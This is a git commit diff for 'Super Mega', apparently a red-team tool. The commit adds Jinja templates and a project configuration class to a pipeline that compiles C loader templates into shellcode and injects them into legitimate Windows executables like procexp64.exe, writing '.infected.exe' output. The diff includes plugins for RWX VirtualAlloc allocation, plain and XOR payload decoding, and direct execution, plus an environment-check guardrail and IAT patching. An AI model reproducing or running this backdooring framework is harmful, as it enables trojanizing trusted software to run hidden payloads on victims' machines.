feature: templates, project

This commit is contained in:
Dobin
2024-02-10 13:43:35 +00:00
parent 1eba815e93
commit 72e4c4ffe5
13 changed files with 276 additions and 218 deletions
+16 -2
View File
@@ -5,9 +5,10 @@ import shutil
import pathlib
import sys
import pefile
import glob
from config import config
from project import project
SHC_VERIFY_SLEEP = 0.1
@@ -94,7 +95,10 @@ def run_process_checkret(args):
print(ret.stdout)
print(ret.stderr)
raise Exception("Command failed")
if project.show_command_output:
print("> " + " ".join(args))
print(ret.stdout)
print(ret.stderr)
def try_start_shellcode(shc_file):
print("--[ Blindly execute shellcode: {} ]".format(shc_file))
@@ -114,3 +118,13 @@ def file_readall_binary(filepath) -> bytes:
with open(filepath, "rb") as f:
data = f.read()
return data
def delete_all_files_in_directory(directory_path):
files = glob.glob(os.path.join(directory_path, '*'))
for file_path in files:
try:
os.remove(file_path)
#print(f"Deleted {file_path}")
except Exception as e:
print(f"Error deleting {file_path}: {e}")
+14 -8
View File
@@ -3,18 +3,24 @@ import pehelper
import pefile
from enum import Enum
class FilePath(str):
pass
class AllocStyle(Enum):
RWX = 1
RW_X = 2
REUSE = 3
RWX = "rwx_1"
#RW_X = "rw_x"
#REUSE = "reuse"
class ExecStyle(Enum):
CALL = 1,
JMP = 2,
FIBER = 3,
CALL = "direct_1",
#JMP = 2,
#FIBER = 3,
class CopyStyle(Enum):
SIMPLE = 1
class DecoderStyle(Enum):
PLAIN_1 = "plain_1"
XOR_1 = "xor_1"
class DataRefStyle(Enum):
APPEND = 1
+1 -17
View File
@@ -31,23 +31,7 @@ class Observer():
self.idx += 1
def __str__(self):
s = ""
s += "{} {}\n\n".format(
self.capabilities_a,
self.options,)
s += "Main: {} Payload Orig: {} Payload Cleanup: {}\n".format(
len(self.main_c),
len(self.payload_asm_orig),
len(self.payload_asm_cleanup),
)
s += "fixup: {} loader: {} final: {}\n".format(
len(self.payload_asm_fixup),
len(self.loader_shellcode),
len(self.final_shellcode),
)
s = "<todo>"
return s
+75 -10
View File
@@ -2,21 +2,83 @@ from helper import *
from config import config
import os
import pprint
from observer import observer
from jinja2 import Template
from project import project
from model import *
use_templates = True
def create_c_from_template():
plugin_allocator = ""
plugin_decoder = ""
plugin_executor = ""
with open("plugins/allocator/rwx_1.c", "r", encoding='utf-8') as file:
plugin_allocator = file.read()
with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file:
plugin_decoder = file.read()
with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
plugin_executor = file.read()
if project.source_style == SourceStyle.peb_walk:
if use_templates:
with open("source/peb_walk/template.c", 'r', encoding='utf-8') as file:
template_content = file.read()
observer.add_text("main_c_template", template_content)
template = Template(template_content)
rendered_template = template.render({
'plugin_allocator': plugin_allocator,
'plugin_decoder': plugin_decoder,
'plugin_executor': plugin_executor,
})
with open("build/main.c", "w", encoding='utf-8') as file:
file.write(rendered_template)
observer.add_text("main_c_rendered", rendered_template)
else:
observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
shutil.copy("source/peb_walk/main.c", "build/main.c")
shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
elif project.source_style == SourceStyle.iat_reuse:
if use_templates:
with open("source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
template_content = file.read()
observer.add_text("main_c_template", template_content)
template = Template(template_content)
rendered_template = template.render({
'plugin_allocator': plugin_allocator,
'plugin_decoder': plugin_decoder,
'plugin_executor': plugin_executor,
})
with open("build/main.c", "w", encoding='utf-8') as file:
file.write(rendered_template)
observer.add_text("main_c_rendered", rendered_template)
else:
observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c"))
shutil.copy("source/iat_reuse/main.c", "build/main.c")
def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
print("--[ C to ASM: {} -> {} ]".format(c_file, asm_file))
asm = {
"initial": "",
"templated": "",
"cleanup": "",
"fixup": "",
}
#
# Phase 1: C To Assembly
print("---[ Compile: {} ]".format(c_file))
print("---[ Make ASM from C: {} ]".format(c_file))
run_process_checkret([
config.get("path_cl"),
"/c",
@@ -30,6 +92,14 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
return
asm["initial"] = file_readall_text(asm_file)
# Phase 1.2: Assembly fixup
print("---[ Fixup : {} ]".format(asm_file))
if not fixup_asm_file(asm_file, payload_len, capabilities):
print("Error: Fixup failed")
return
else:
asm["fixup"] = file_readall_text(asm_file)
# Phase 1.1: Assembly cleanup
asm_clean_file = asm_file + ".clean"
print("---[ Cleanup: {} ]".format(asm_file))
@@ -45,13 +115,7 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
shutil.move(asm_clean_file, asm_file)
asm["cleanup"] = file_readall_text(asm_file)
# Phase 1.2: Assembly fixup
print("---[ Fixup : {} ]".format(asm_file))
if not fixup_asm_file(asm_file, payload_len, capabilities):
print("Error: Fixup failed")
return
else:
asm["fixup"] = file_readall_text(asm_file)
return asm
@@ -83,8 +147,6 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
# Fix call
if "call" in lines[idx] and "__imp_" in lines[idx]:
func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip()
print(" > Replace func name: {}".format(func_name))
exeCapability = capabilities.get(func_name)
if exeCapability == None:
print("Error Capabilities not: {}".format(func_name))
@@ -92,6 +154,9 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
randbytes: bytes = os.urandom(6)
lines[idx] = bytes_to_asm_db(randbytes) + "\r\n"
exeCapability.id = randbytes
print(" > Replace func name: {} with {}".format(
func_name, randbytes))
# replace external reference with shellcode reference
for idx, line in enumerate(lines):
+11 -5
View File
@@ -1,11 +1,17 @@
from helper import *
import shutil
import pprint
from pehelper import *
from model import *
from project import project
def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilities):
def inject_exe(shc_file: FilePath):
exe_in: FilePath = project.inject_exe_in
exe_out: FilePath = project.inject_exe_out
exe_capabilities: ExeCapabilities = project.exe_capabilities
print("--[ Injecting: {} into: {} -> {} ]".format(
shc_file, exe_in, exe_out
))
@@ -15,13 +21,13 @@ def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilitie
# inject shellcode into exe_out with redbackdoorer
# python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe
subprocess.run([
run_process_checkret([
"python3.exe",
"redbackdoorer.py",
mode,
project.inject_mode,
shc_file,
exe_out
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
])
# get code section of exe_out
code = get_code_section(exe_out)
@@ -30,7 +36,7 @@ def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities: ExeCapabilitie
# and re-implant it
for cap in exe_capabilities.get_all().values():
if not cap.id in code:
print("Not found, abort")
print("Capability ID {} not found, abort".format(cap.id))
raise Exception()
off = code.index(cap.id)
+1
View File
@@ -0,0 +1 @@
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
+3
View File
@@ -0,0 +1,3 @@
for(int n=0; n<11223344; n++) {
dest[n] = supermega_payload[n];
}
+3
View File
@@ -0,0 +1,3 @@
for (i=0; i<11223344; i++){
dest[i] = supermega_payload[i] ^ 0x42;
}
+1
View File
@@ -0,0 +1 @@
(*(void(*)())(dest))();
+36
View File
@@ -0,0 +1,36 @@
from model import *
class Project():
def __init__(self):
# User, generating normally
self.payload: FilePath = ""
self.source_style: SourceStyle = SourceStyle.peb_walk
self.alloc_style: AllocStyle = AllocStyle.RWX
self.exec_style: ExecStyle = ExecStyle.CALL
self.decoder_style: DecoderStyle = DecoderStyle.PLAIN_1
self.dataref_style: DataRefStyle = DataRefStyle.APPEND
self.inject: bool = False
self.inject_mode: str = "1,1"
self.inject_exe_in: FilePath = ""
self.inject_exe_out: FilePath = ""
self.exe_capabilities: ExeCapabilities = None
# debug
self.show_command_output = True
self.verify: bool = False
self.try_start_loader_shellcode: bool = False
self.try_start_final_shellcode: bool = False
self.try_start_final_infected_exe: bool = False
self.cleanup_files_on_start: bool = True
self.cleanup_files_on_exit: bool = True
self.generate_asm_from_c: bool = True
self.generate_shc_from_asm: bool = True
project = Project()
+1
View File
@@ -1,3 +1,4 @@
pefile
capstone
keystone-engine
jinja2
+56
View File
@@ -0,0 +1,56 @@
#include <Windows.h>
char *supermega_payload;
int main()
{
// Execution Guardrail: Env Check
wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024);
if (result == 0) {
return 6;
}
if (mystrcmp(buffer, tocheck) != 0) {
return 6;
}
// char *dest = ...
{{ plugin_allocator }}
// dest[] = supermega_payload[]
// len: 0x11223344
{{ plugin_decoder }}
// dest[]
{{ plugin_executor }}
/*
// Copy shellcode
// ntdll.dll: VirtualAlloc()
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
// 11223344 is a magic number which will be replaced in the asm source
// with the payload length.
for(int n=0; n<11223344; n++) {
dest[n] = supermega_payload[n];
}
// Exec shellcode
(*(void(*)())(dest))();
*/
return 0;
}
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
+58 -176
View File
@@ -12,138 +12,13 @@ from phases.ctoasm import *
from phases.asmtoshc import *
from phases.shctoexe import *
from observer import observer
options_default = {
"payload": "shellcodes/calc64.bin",
"verify": False,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/procexp64.exe",
"inject_exe_out": "out/procexp64-a.exe",
"try_start_loader_shellcode": False, # without payload (Debugging)
"try_start_final_shellcode": False, # with payload (should work)
"try_start_final_infected_exe": True, # with payload (should work)
# cleanup
"cleanup_files_on_start": False,
"cleanup_files_on_exit": False,
# For debugging: Can disable some steps
"generate_asm_from_c": True,
"generate_shc_from_asm": True,
# Not working atm
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
# VERIFY: STD
# This will verify if our loader works
# - payload shellcode will create a file c:\temp\a
options_verify_std = {
"payload": "shellcodes/createfile.bin",
"verify": True,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# testing
"try_start_loader_shellcode": False,
"try_start_final_shellcode": False,
"try_start_final_infected_exe": False,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/procexp64.exe",
"inject_exe_out": "out/procexp64-a.exe",
# For debugging: Can disable some steps
"generate_asm_from_c": True, # phase 2
"generate_shc_from_asm": True, # phase 3
# cleanup
"cleanup_files_on_start": True,
"cleanup_files_on_exit": True, # all is just in out/
# doesnt work
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
# VERIFY: IAT
# This will verify if our loader works
# - payload shellcode will create a file c:\temp\a
options_verify_iat = {
"payload": "shellcodes/createfile.bin",
"verify": True,
# Temp
"source_style": SourceStyle.peb_walk,
# configuration
"alloc_style": AllocStyle.RWX,
"exec_style": ExecStyle.CALL,
"copy_style": CopyStyle.SIMPLE,
"dataref_style": DataRefStyle.APPEND,
# testing
"try_start_loader_shellcode": False,
"try_start_final_shellcode": False,
"try_start_final_infected_exe": False,
# injecting into exe
"inject_exe": True,
"inject_mode": "1,1",
"inject_exe_in": "exes/iattest-full.exe", # important
"inject_exe_out": "out/iatttest-full-a.exe",
# For debugging: Can disable some steps
"generate_asm_from_c": True,
"generate_shc_from_asm": True,
# cleanup
"cleanup_files_on_start": True,
"cleanup_files_on_exit": True, # all is just in out/
# doesnt work
"obfuscate_shc_loader": False,
"test_obfuscated_shc": False,
}
options = None
from project import project
main_c_file = os.path.join(build_dir, "main.c")
main_asm_file = os.path.join(build_dir, "main.asm")
main_exe_file = os.path.join(build_dir, "main.exe")
main_shc_file = os.path.join(build_dir, "main.bin")
debug_data = {
"original_exe": b"",
"infected_exe": b"",
}
def main():
print("Super Mega")
@@ -156,80 +31,90 @@ def main():
args = parser.parse_args()
if args.verify:
project.payload = "shellcodes/createfile.bin"
project.verify = True
project.try_start_final_infected_exe = False
project.try_start_final_shellcode = False
project.try_start_final_infected_exe = False
if args.verify == "std":
options = options_verify_std
project.source_style = SourceStyle.peb_walk
project.inject = True
project.inject_mode = "1,1"
project.inject_exe_in = "exes/procexp64.exe"
project.inject_exe_out = "out/procexp64-a.exe"
elif args.verify == "iat":
options = options_verify_iat
project.source_style = SourceStyle.iat_reuse
project.inject = True
project.inject_mode = "1,1"
project.inject_exe_in = "exes/iattest-full.exe"
project.inject_exe_out = "out/iatttest-full-a.exe"
else:
print("Unknown verify option {}, use std/iat".format(args.verify))
else:
options = options_default
if args.shellcode:
if not os.path.isfile(args.shellcode):
print("Could not find: {}".format(args.shellcode))
return
options["payload"] = args.shellcode
project.payload = args.shellcode
if args.inject:
if not os.path.isfile(args.inject):
print("Could not find: {}".format(args.inject))
return
options["inject_exe"] = True
options["inject_exe_in"] = args.inject
options["inject_exe_out"] = args.inject.replace(".exe", ".infected.exe")
start(options)
project.inject = True
project.inject_exe_in = args.inject
project.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
start()
def start(options):
def start():
# Delete: all old files
if options["cleanup_files_on_start"]:
if project.cleanup_files_on_start:
clean_files()
delete_all_files_in_directory("logs/")
# Check: Destination EXE capabilities
capabilities = ExeCapabilities([
project.exe_capabilities = ExeCapabilities([
"GetEnvironmentVariableW",
"VirtualAlloc"
])
capabilities.parse_from_exe(options["inject_exe_in"])
capabilities.print()
project.exe_capabilities.parse_from_exe(project.inject_exe_in)
project.exe_capabilities.print()
if capabilities.has_all():
options["source_style"] = SourceStyle.iat_reuse
# choose which source / technique we gonna use
if project.exe_capabilities.has_all():
project.source_style = SourceStyle.iat_reuse
else:
options["source_style"] = SourceStyle.peb_walk
project.source_style = SourceStyle.peb_walk
observer.add_json("capabilities_a", capabilities)
observer.add_json("options", options)
#observer.add_json("capabilities_a", project.exe_capabilities)
#observer.add_json("options", options)
print("--[ SourceStyle: {}".format(options["source_style"].name))
print("--[ SourceStyle: {}".format(project.source_style.name))
# Copy: loader C files into working directory: build/
if options["source_style"] == SourceStyle.peb_walk:
observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
shutil.copy("source/peb_walk/main.c", "build/main.c")
shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
elif options["source_style"] == SourceStyle.iat_reuse:
observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c"))
shutil.copy("source/iat_reuse/main.c", "build/main.c")
create_c_from_template()
# Convert: C -> ASM
if options["generate_asm_from_c"]:
if project.generate_asm_from_c:
# Find payload size
with open(options["payload"], 'rb') as input2:
with open(project.payload, 'rb') as input2:
data_payload = input2.read()
payload_length = len(data_payload)
#observer.add_text("payload_asm_orig", str(data_payload))
asm = make_c_to_asm(main_c_file, main_asm_file, payload_length, capabilities)
asm = make_c_to_asm(main_c_file, main_asm_file, payload_length, project.exe_capabilities)
observer.add_text("payload_asm_orig", asm["initial"])
observer.add_text("payload_asm_cleanup", asm["cleanup"])
observer.add_text("payload_asm_fixup", asm["fixup"])
# Convert: ASM -> Shellcode
if options["generate_shc_from_asm"]:
if project.generate_shc_from_asm:
code = make_shc_from_asm(main_asm_file, main_exe_file, main_shc_file)
observer.add_code("generate_shc_from_asm", code)
# Try: Starting the shellcode (rarely useful)
if options["try_start_loader_shellcode"]:
if project.try_start_loader_shellcode:
try_start_shellcode(main_shc_file)
# SGN
@@ -241,11 +126,12 @@ def start(options):
# return
# Merge shellcode/loader with payload
if options["dataref_style"] == DataRefStyle.APPEND:
print("--[ Merge stager: {} + {} -> {} ] ".format(main_shc_file, options["payload"], main_shc_file))
if project.dataref_style == DataRefStyle.APPEND:
print("--[ Merge stager: {} + {} -> {} ] ".format(
main_shc_file, project.payload, main_shc_file))
with open(main_shc_file, 'rb') as input1:
data_stager = input1.read()
with open(options["payload"], 'rb') as input2:
with open(project.payload, 'rb') as input2:
data_payload = input2.read()
print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format(
len(data_stager), len(data_payload), len(data_stager)+len(data_payload)))
@@ -255,13 +141,13 @@ def start(options):
output.write(data)
observer.add_code("final_shellcode", data)
if options["verify"] and options["source_style"] == SourceStyle.peb_walk:
if project.verify and project.source_style == SourceStyle.peb_walk:
print("--[ Verify final shellcode ]")
if not verify_shellcode(main_shc_file):
print("Could not verify, still continuing")
#return
if options["try_start_final_shellcode"]:
if project.try_start_final_shellcode:
print("--[ Test Append shellcode ]")
try_start_shellcode(main_shc_file)
@@ -269,24 +155,20 @@ def start(options):
shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
# inject merged loader into an exe
if options["inject_exe"]:
debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
if project.inject:
#debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
inject_exe(
main_shc_file,
options["inject_exe_in"],
options["inject_exe_out"],
options["inject_mode"],
capabilities)
if options["verify"]:
inject_exe(main_shc_file)
if project.verify:
print("--[ Verify final exe ]")
if verify_injected_exe(options["inject_exe_out"]):
debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"])
if verify_injected_exe(project.inject_exe_out):
#debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"])
pass
if options["try_start_final_infected_exe"]:
if project.try_start_final_infected_exe:
print("--[ Start infected exe ]")
subprocess.run([
options["inject_exe_out"],
project.inject_exe_out,
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# dump the info i gathered
@@ -295,7 +177,7 @@ def start(options):
file.close()
# delete files
if options["cleanup_files_on_exit"]:
if project.cleanup_files_on_exit:
clean_files()